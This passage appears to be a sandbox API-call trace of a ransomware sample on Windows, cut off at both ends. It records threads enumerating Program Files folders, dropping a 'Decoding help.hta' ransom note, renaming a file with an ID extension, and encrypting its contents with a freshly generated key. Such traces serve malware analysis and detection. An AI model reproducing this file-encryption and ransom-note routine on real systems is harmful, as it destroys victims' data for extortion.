ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7c36dac1, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x285, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0057.616] lstrcpyW (in: lpString1=0x10fef658, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*" [0057.616] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*") returned 71 [0057.616] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Decoding help.hta" [0057.616] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0057.616] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Desktop.ini") returned -1 [0057.616] lstrlenW (lpString="Desktop.ini") returned 11 [0057.616] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*" [0057.616] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*") returned 71 [0057.616] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\", lpString2="Desktop.ini" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" [0057.616] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" [0057.616] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0057.616] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0057.617] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0057.617] CreateFileMappingA (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x9b0 [0057.617] CryptAcquireContextA (in: phProv=0x1549fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1549fcec*=0x3449710) returned 1 [0060.170] CryptGenKey (in: hProv=0x3449710, Algid=0x6610, dwFlags=0x1, phKey=0x1549fce8 | out: phKey=0x1549fce8*=0x5e2870) returned 1 [0060.170] CryptExportKey (in: hKey=0x5e2870, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1549fbe4, pdwDataLen=0x1549fce4 | out: pbData=0x1549fbe4*, pdwDataLen=0x1549fce4*=0x2c) returned 1 [0060.170] MapViewOfFile (hFileMappingObject=0x9b0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x280) returned 0x570000 [0063.798] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1549fbe4*, pdwDataLen=0x1549fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1549fbe4*, pdwDataLen=0x1549fcf8*=0x100) returned 1 [0063.799] CryptEncrypt (in: hKey=0x5e2870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x570000*, pdwDataLen=0x1549fce4*=0x280, dwBufLen=0x280 | out: pbData=0x570000*, pdwDataLen=0x1549fce4*=0x280) returned 1 [0063.799] UnmapViewOfFile (lpBaseAddress=0x570000) Thread: id = 307 os_tid = 0x61c [0042.468] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\*.*", lpFindFileData=0x155dfd30 | out: lpFindFileData=0x155dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xd6e32460, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6e32460, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2ff0 [0045.461] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.461] FindNextFileW (in: hFindFile=0x5e2ff0, lpFindFileData=0x155dfd30 | out: lpFindFileData=0x155dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xd6e32460, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6e32460, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.627] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.627] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.627] FindNextFileW (in: hFindFile=0x5e2ff0, lpFindFileData=0x155dfd30 | out: lpFindFileData=0x155dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0048.627] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0048.627] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0048.627] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0048.629] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\*.*" [0048.629] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\*.*") returned 69 [0048.629] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US" [0048.629] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US\\*.*" [0048.629] GlobalMemoryStatus (in: lpBuffer=0x155dfd10 | out: lpBuffer=0x155dfd10) [0048.629] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x246f54d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x548 [0048.640] CloseHandle (hObject=0x548) returned 1 [0048.640] FindNextFileW (in: hFindFile=0x5e2ff0, lpFindFileData=0x155dfd30 | out: lpFindFileData=0x155dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6e32460, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xd6e32460, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6e32460, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WksConv", cAlternateFileName="")) returned 1 [0048.640] lstrcmpW (lpString1=".", lpString2="WksConv") returned -1 [0048.640] lstrcmpW (lpString1="..", lpString2="WksConv") returned -1 [0048.640] lstrcmpiW (lpString1="windows", lpString2="WksConv") returned -1 [0048.642] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\*.*" [0048.642] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\*.*") returned 69 [0048.642] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\", lpString2="WksConv" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv" [0048.642] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\*.*" [0048.642] GlobalMemoryStatus (in: lpBuffer=0x155dfd10 | out: lpBuffer=0x155dfd10) [0048.643] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2473d610, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x548 [0048.659] CloseHandle (hObject=0x548) returned 1 [0048.659] FindNextFileW (in: hFindFile=0x5e2ff0, lpFindFileData=0x155dfd30 | out: lpFindFileData=0x155dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6e32460, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xd6e32460, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6e32460, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WksConv", cAlternateFileName="")) returned 0 [0048.659] FindClose (in: hFindFile=0x5e2ff0 | out: hFindFile=0x5e2ff0) returned 1 Thread: id = 308 os_tid = 0x4a0 [0042.469] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\*.*", lpFindFileData=0x1571fd30 | out: lpFindFileData=0x1571fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6714b0 [0042.509] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.509] FindNextFileW (in: hFindFile=0x6714b0, lpFindFileData=0x1571fd30 | out: lpFindFileData=0x1571fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.509] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.509] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.509] FindNextFileW (in: hFindFile=0x6714b0, lpFindFileData=0x1571fd30 | out: lpFindFileData=0x1571fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0042.509] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0042.509] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0042.509] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0042.629] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\*.*" [0042.629] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\*.*") returned 68 [0042.629] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\en-US") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\en-US" [0042.629] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\en-US\\*.*" [0042.630] GlobalMemoryStatus (in: lpBuffer=0x1571fd10 | out: lpBuffer=0x1571fd10) [0042.630] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10c26660, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x65c [0042.638] CloseHandle (hObject=0x65c) returned 1 [0042.638] FindNextFileW (in: hFindFile=0x6714b0, lpFindFileData=0x1571fd30 | out: lpFindFileData=0x1571fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0042.638] FindClose (in: hFindFile=0x6714b0 | out: hFindFile=0x6714b0) returned 1 Thread: id = 309 os_tid = 0x7d8 [0042.471] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\*.*", lpFindFileData=0x1585fd30 | out: lpFindFileData=0x1585fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec355540, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xec355540, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xec355540, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6713b0 [0042.503] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.503] FindNextFileW (in: hFindFile=0x6713b0, lpFindFileData=0x1585fd30 | out: lpFindFileData=0x1585fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec355540, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xec355540, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xec355540, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.503] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.503] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.503] FindNextFileW (in: hFindFile=0x6713b0, lpFindFileData=0x1585fd30 | out: lpFindFileData=0x1585fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec355540, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xec355540, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xec355540, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBA6", cAlternateFileName="")) returned 1 [0042.503] lstrcmpW (lpString1=".", lpString2="VBA6") returned -1 [0042.503] lstrcmpW (lpString1="..", lpString2="VBA6") returned -1 [0042.503] lstrcmpiW (lpString1="windows", lpString2="VBA6") returned 1 [0042.588] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\*.*" [0042.588] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\*.*") returned 64 [0042.588] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\", lpString2="VBA6" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6" [0042.588] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\*.*" [0042.588] GlobalMemoryStatus (in: lpBuffer=0x1585fd10 | out: lpBuffer=0x1585fd10) [0042.588] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x114b9188, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6cc [0042.589] CloseHandle (hObject=0x6cc) returned 1 [0042.589] FindNextFileW (in: hFindFile=0x6713b0, lpFindFileData=0x1585fd30 | out: lpFindFileData=0x1585fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec355540, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xec355540, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xec355540, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBA6", cAlternateFileName="")) returned 0 [0042.589] FindClose (in: hFindFile=0x6713b0 | out: hFindFile=0x6713b0) returned 1 Thread: id = 310 os_tid = 0x618 [0042.490] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\*.*", lpFindFileData=0x15adfd30 | out: lpFindFileData=0x15adfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7ded59e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6712f0 [0042.490] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.490] FindNextFileW (in: hFindFile=0x6712f0, lpFindFileData=0x15adfd30 | out: lpFindFileData=0x15adfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7ded59e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.490] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.490] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.490] FindNextFileW (in: hFindFile=0x6712f0, lpFindFileData=0x15adfd30 | out: lpFindFileData=0x15adfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7ded59e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="58.0.3029.110", cAlternateFileName="580302~1.110")) returned 1 [0042.490] lstrcmpW (lpString1=".", lpString2="58.0.3029.110") returned -1 [0042.490] lstrcmpW (lpString1="..", lpString2="58.0.3029.110") returned -1 [0042.491] lstrcmpiW (lpString1="windows", lpString2="58.0.3029.110") returned 1 [0042.493] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\*.*" [0042.493] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\*.*") returned 56 [0042.493] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\", lpString2="58.0.3029.110" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110" [0042.493] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\*.*" [0042.493] GlobalMemoryStatus (in: lpBuffer=0x15adfd10 | out: lpBuffer=0x15adfd10) [0042.493] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x114a1120, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x64c [0042.496] CloseHandle (hObject=0x64c) returned 1 [0042.496] FindNextFileW (in: hFindFile=0x6712f0, lpFindFileData=0x15adfd30 | out: lpFindFileData=0x15adfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7344dbd0, ftLastWriteTime.dwHighDateTime=0x1d2c8a4, nFileSizeHigh=0x0, nFileSizeLow=0x117358, dwReserved0=0x0, dwReserved1=0x0, cFileName="chrome.exe", cAlternateFileName="")) returned 1 [0042.496] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\*.*" [0042.496] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\*.*") returned 56 [0042.496] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\Decoding help.hta" [0042.496] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\Decoding help.hta" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\decoding help.hta")) returned 0xffffffff [0042.496] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\Decoding help.hta" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x64c [0042.496] WriteFile (in: hFile=0x64c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x15adfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x15adfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.497] CloseHandle (hObject=0x64c) returned 1 [0042.497] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.498] lstrcmpiW (lpString1="Decoding help.hta", lpString2="chrome.exe") returned 1 [0042.498] lstrlenW (lpString="chrome.exe") returned 10 [0042.498] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\*.*" [0042.498] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\*.*") returned 56 [0042.498] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\", lpString2="chrome.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe") returned="\\\\?\\C:\\Program Files 